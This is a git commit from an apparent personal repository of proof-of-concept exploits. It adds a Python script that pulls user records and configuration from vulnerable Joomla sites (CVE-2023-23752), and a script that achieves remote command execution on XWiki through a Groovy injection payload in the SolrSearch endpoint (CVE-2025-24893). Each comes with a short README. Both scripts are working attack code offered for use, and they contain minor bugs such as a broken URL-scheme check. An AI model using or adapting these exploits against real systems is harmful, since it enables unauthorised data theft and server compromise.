Reformat the repo to store all my PoCs and add CVE-2025-24893
This commit is contained in:
0xVoodoo
@@ -0,0 +1,76 @@
|
||||
import requests
|
||||
import json
|
||||
import argparse
|
||||
|
||||
class User:
|
||||
def __init__(user, name, email, lastvisitDate, groupNames):
|
||||
user.name = name
|
||||
user.email = email
|
||||
user.lastvisitDate = lastvisitDate
|
||||
user.groupNames = groupNames
|
||||
|
||||
def __str__(user):
|
||||
return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
|
||||
|
||||
def vulnCheck(tgt):
|
||||
verUrl = tgt + "/administrator/manifests/files/joomla.xml"
|
||||
verData = requests.get(verUrl)
|
||||
if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
|
||||
print("[-] Site does not appear to be vulnerable!")
|
||||
raise SystemExit
|
||||
|
||||
def getUsers(tgt):
|
||||
usrUrl = tgt + "/api/index.php/v1/users?public=true"
|
||||
usrData = requests.get(usrUrl)
|
||||
if "404" in usrData.text.lower() or "403" in usrData.text.lower():
|
||||
print("[-] Error fetching user data, site may not be vulnerable")
|
||||
raise SystemExit
|
||||
parsedUsrs = json.loads(usrData.text)
|
||||
return parsedUsrs
|
||||
|
||||
def parseUsers(usrData):
|
||||
users = []
|
||||
for user in usrData["data"]:
|
||||
userAtribs = user["attributes"]
|
||||
newUser = User(userAtribs["username"],
|
||||
userAtribs["email"],
|
||||
userAtribs["lastvisitDate"],
|
||||
userAtribs["group_names"] )
|
||||
users.append(newUser)
|
||||
return users
|
||||
|
||||
def getConfig(tgt):
|
||||
cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
|
||||
cfgData = requests.get(cfgUrl)
|
||||
if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
|
||||
print("[-] Error fetching user data, site may not be vulnerable")
|
||||
raise SystemExit
|
||||
parsedCfg = json.loads(cfgData.text)
|
||||
return parsedCfg
|
||||
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
|
||||
parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
|
||||
args = parser.parse_args()
|
||||
|
||||
tgt = args.target.lower()
|
||||
|
||||
if tgt[4] != "http" and tgt[5] != "https":
|
||||
print("[*] No URL schema specified, defaulting to HTTP")
|
||||
tgt = "http://" + tgt
|
||||
|
||||
vulnCheck(tgt)
|
||||
|
||||
print(f"\n[+] User data found!")
|
||||
print("----------")
|
||||
for user in parseUsers(getUsers(tgt)):
|
||||
print(user)
|
||||
print("----------")
|
||||
|
||||
print(f"\n[+] Config data found!")
|
||||
print("----------")
|
||||
for i in getConfig(tgt)["data"]:
|
||||
print(i["attributes"])
|
||||
|
||||
@@ -0,0 +1,27 @@
|
||||
# CVE-2023-23752 - Joomla Information Disclosure
|
||||
|
||||
Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
|
||||
|
||||
I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
|
||||
|
||||
---
|
||||
This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
|
||||
|
||||
#### User Info
|
||||
|
||||
`/api/index.php/v1/config/applicaton?public=true`
|
||||
|
||||
#### Config Info
|
||||
|
||||
`/api/index.php/v1/config/application?public=true"`
|
||||
|
||||
## Usage
|
||||
`python3 CVE-2023-23752.py -t <target_url>`
|
||||
|
||||
---
|
||||
|
||||
|
||||
# License
|
||||
GPL v3.0 - as all good software should be
|
||||
|
||||
Remember - don't be a skid :)
|
||||
@@ -0,0 +1,59 @@
|
||||
import requests
|
||||
import argparse
|
||||
import urllib.parse
|
||||
|
||||
# Pretty colors :)
|
||||
RED = "\033[31m"
|
||||
GREEN = "\033[32m"
|
||||
YELLOW = "\033[33m"
|
||||
BOLD = "\033[1m"
|
||||
RESET = "\033[0m"
|
||||
|
||||
def testVuln(target):
|
||||
try:
|
||||
resp = requests.get(target)
|
||||
except requests.exceptions.RequestException as error:
|
||||
print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
|
||||
raise SystemExit(error)
|
||||
|
||||
if "xwiki" not in resp.text.lower():
|
||||
print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
|
||||
return False
|
||||
else:
|
||||
return True
|
||||
|
||||
def exploit(target, cmd):
|
||||
payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
|
||||
exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}'
|
||||
try:
|
||||
print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
|
||||
resp = requests.get(exploitUrl)
|
||||
except requests.exceptions.RequestException as error:
|
||||
print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
|
||||
raise SystemExit(error)
|
||||
print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
|
||||
description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
|
||||
epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
|
||||
parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
|
||||
parser.add_argument('-c', '--command', required=True, help='Command to execute')
|
||||
args = parser.parse_args()
|
||||
|
||||
print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
|
||||
|
||||
tgt = args.target.lower()
|
||||
if tgt[4] != "http" and tgt[5] != "https":
|
||||
print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
|
||||
tgt = 'http://' + tgt
|
||||
|
||||
if testVuln(tgt):
|
||||
exploit(tgt, args.command)
|
||||
else:
|
||||
raise SystemExit()
|
||||
|
||||
|
||||
@@ -0,0 +1,11 @@
|
||||
# CVE-2025-24893 - XWiki RCE
|
||||
|
||||
This vuln stems from improper user input sanitization when passing SolrSearch queries. Arbitrary groovy code can be executed due to a direct evaluate() call.
|
||||
|
||||
The vulnerable endpoint here is:
|
||||
`/xwiki/bin/get/Main/SolrSearch?media=rss&text=`
|
||||
|
||||
# License
|
||||
GPL v3.0 - as all good software should be
|
||||
|
||||
Remember - don't be a skid :)
|
||||
@@ -1,27 +1,11 @@
|
||||
# CVE-2023-23752 - Joomla Information Disclosure
|
||||
# PoCs
|
||||
|
||||
Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
|
||||
This repo contains proof of concept exploits for vulnerabilities I've come across in pentests and CTFs. This goes without saying but I am not liable for any misuse of these scripts, please be responsible.
|
||||
|
||||
I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
|
||||
|
||||
---
|
||||
This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
|
||||
|
||||
#### User Info
|
||||
|
||||
`/api/index.php/v1/config/applicaton?public=true`
|
||||
|
||||
#### Config Info
|
||||
|
||||
`/api/index.php/v1/config/application?public=true"`
|
||||
|
||||
## Usage
|
||||
`python3 CVE-2023-23752.py -t <target_url>`
|
||||
|
||||
---
|
||||
|
||||
# Exploits
|
||||
- [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/CVE-2023-23752) - Information disclosure in Joomla CMS.
|
||||
- [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/CVE-2025-24893) - RCE in XWiki.
|
||||
|
||||
# License
|
||||
GPL v3.0 - as all good software should be
|
||||
|
||||
Remember - don't be a skid :)
|
||||
GPLv3 as all good software (or exploits I guess) should be.
|
||||
|
||||
Reference in New Issue
Block a user